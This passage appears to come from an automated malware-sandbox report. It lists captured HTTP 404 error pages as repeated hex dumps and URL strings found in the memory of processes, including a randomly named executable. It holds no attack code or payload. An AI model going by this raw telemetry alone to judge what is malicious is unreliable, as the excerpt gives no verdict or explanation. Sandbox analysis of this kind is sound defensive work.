74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:36:06 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:36:08 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:36:11 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 08:36:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 08:36:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 08:36:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 11 Jan 2025 08:36:25 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005912000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000003D82000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000003284000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1730647534.000000002E4C4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
